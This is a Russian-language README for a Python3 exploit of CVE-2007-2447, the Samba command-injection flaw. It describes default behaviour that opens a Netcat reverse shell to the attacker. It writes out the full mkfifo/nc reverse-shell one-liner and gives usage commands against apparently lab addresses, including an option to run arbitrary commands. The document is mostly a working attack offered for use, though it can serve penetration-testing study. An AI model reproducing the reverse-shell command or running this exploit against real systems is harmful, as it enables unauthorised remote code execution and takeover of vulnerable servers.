
Эксплойт-код для CVE-2007-2447, написанный на Python3.
Этот репозиторий содержит мой эксплойт для CVE-2007-2447, написанный на Python3. По умолчанию он отправляет обратную оболочку Netcat OpenBSD на порт 443 целевого хоста, но вы также можете указать произвольную команду.
# Netcat OpenBSD reverse shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f
# Эксплуатируем цель 10.129.232.46 на порту 445, отправляем обратную оболочку на 10.10.14.82 порт 443
python3 CVE-2007-2447.py --rhost 10.129.232.46 --lhost 10.10.14.82
# С указанием своих rport и lport
python3 CVE-2007-2447.py --rhost 10.129.232.46 --rport 4445 --lhost 10.10.14.82 --lport 31337
# Выполнение произвольной команды и установка тайм-аута для медленных хостов
python3 CVE-2007-2447.py --rhost 10.129.232.46 -c "ping -c 3 10.10.14.82" -t 10